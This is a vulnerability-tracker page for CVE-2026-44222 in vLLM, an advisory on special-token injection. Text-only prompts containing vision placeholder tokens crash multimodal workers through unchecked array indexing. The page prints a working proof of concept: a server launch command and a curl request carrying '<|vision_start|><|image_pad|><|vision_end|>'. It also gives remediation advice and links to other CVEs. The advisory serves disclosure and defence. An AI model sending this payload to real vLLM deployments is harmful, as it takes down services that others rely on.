Skip to main content

vLLM CVE-2026-44222

MEDIUM
Improper Validation of Array Index (CWE-129)
2026-05-05 https://github.com/vllm-project/vllm GHSA-hpv8-x276-m59f
6.5
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
6.5 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High

Lifecycle Timeline

2
Source Code Evidence Fetched
May 05, 2026 - 23:02 vuln.today
Analysis Generated
May 05, 2026 - 23:02 vuln.today

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 1 pypi packages depend on vllm (1 direct, 0 indirect)

Ecosystem-wide dependent count for version 0.6.1.

DescriptionGitHub Advisory

Summary

This report explains a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.

Details

  • Affected component: multimodal input position computation.
  • File/functions (paths are indicative):
  • vllm/model_executor/layers/rotary_embedding.py
  • get_input_positions_tensor(...)
  • _vl_get_input_positions_tensor(...)
  • Failure mechanism:
  • The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly.
  • When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing.

Representative snippet (context):

python
# vllm/model_executor/layers/rotary_embedding.py
@classmethod
def _vl_get_input_positions_tensor(
    cls,
    input_tokens,
    hf_config,
    image_grid_thw,
    video_grid_thw,
    ...,
):
# detect video tokens
    video_nums = (vision_tokens == video_token_id).sum()
# later in processing
    t, h, w = (
        video_grid_thw[video_index][0],
# IndexError if no video data
        video_grid_thw[video_index][1],
        video_grid_thw[video_index][2],
    )

Abbreviated call path:

OpenAI API request
 → vllm.v1.engine.core: step/execute_model
 → vllm.v1.worker.gpu_model_runner: _update_states/execute_model
 → vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor
 → _vl_get_input_positions_tensor
 → IndexError: list index out of range

PoC

Environment

  • vLLM: 0.10.0
  • Model: Qwen/Qwen2.5-VL-3B-Instruct
  • Launch server:
bash
python -m vllm.entrypoints.openai.api_server \
  --model Qwen/Qwen2.5-VL-3B-Instruct \
  --port 8000

Request (text-only, no image/video data)

bash
cat > request.json <<'JSON'
{
  "model": "Qwen/Qwen2.5-VL-3B-Instruct",
  "messages": [
    {
      "role": "user",
      "content": [
        { "type": "text",
          "text": "what's in picture <|vision_start|><|image_pad|><|vision_end|>" }
      ]
    }
  ]
}
JSON

curl -s http://127.0.0.1:8000/v1/chat/completions \
  -H 'Content-Type: application/json' \
  --data @request.json

Observed result

  • HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...).
  • In some deployments, the worker exits and capacity remains reduced until manual restart.

Impact

  • Type: Token Injection leading to Remote Denial of Service (unauthenticated). A single request can trigger the fault.
  • Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts).
  • Effect: Request → unhandled exception in position computation → worker termination / service unavailability.

Fixes

  • Changes associated with https://github.com/vllm-project/vllm/issues/32656

Credits

Pengyu Ding (Infra Security, Ant Group) Ziteng Xu (Infra Security, Ant Group)

AnalysisAI

Remote denial of service in vLLM 0.6.1 through 0.19.x allows unauthenticated attackers to crash worker processes by sending text-only prompts containing special multimodal placeholder tokens (e.g., '<|vision_start|><|image_pad|><|vision_end|>') without corresponding image or video data. The vulnerability stems from unprotected array indexing in the input position computation layer when processing vision tokens, causing an IndexError that terminates the worker and degrades service availability. A single malicious request can trigger the fault.

Technical ContextAI

The vulnerability exists in vLLM's multimodal input processing pipeline, specifically in the _vl_get_input_positions_tensor() function within vllm/model_executor/layers/rotary_embedding.py. This function is responsible for computing positional embeddings for vision language models (VLMs) that support multimodal inputs. The code detects vision tokens (image and video placeholders) in the input token stream and attempts to index into corresponding grid metadata arrays (image_grid_thw and video_grid_thw) to retrieve spatial dimensions. However, when user input contains special vision token sequences without actual multimodal payload data, these grid arrays remain empty. The code performs direct indexing without bounds checking, triggering an IndexError: list index out of range when attempting to access grid[video_index][dimension]. The root cause is Improper Input Validation (CWE-129), where user-controlled token sequences are not validated before array indexing operations. This affects all VLM deployments using the rotary embedding computation path, including models like Qwen2.5-VL.

RemediationAI

Upgrade vLLM to version 0.20.0 or later, which includes bounds checking and proper validation of vision grid arrays before indexing. For environments unable to upgrade immediately, implement rate limiting and request validation at the API gateway level: reject or sanitize text inputs containing special vision token sequences (<|vision_start|>, <|image_pad|>, <|vision_end|>, etc.) unless accompanied by actual image or video data in the request payload. Additionally, configure process monitoring and auto-restart policies for vLLM workers to minimize downtime from crashes; for example, use systemd or Kubernetes restart policies set to 'Always'. Implement request signing or API key validation if not already in place to reduce exposure to unauthenticated attacks, though this is a workaround rather than a fix. The primary remediation is patching to 0.20.0 or later. See advisory https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f and issue https://github.com/vllm-project/vllm/issues/32656 for implementation details.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

CVE-2026-44222 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy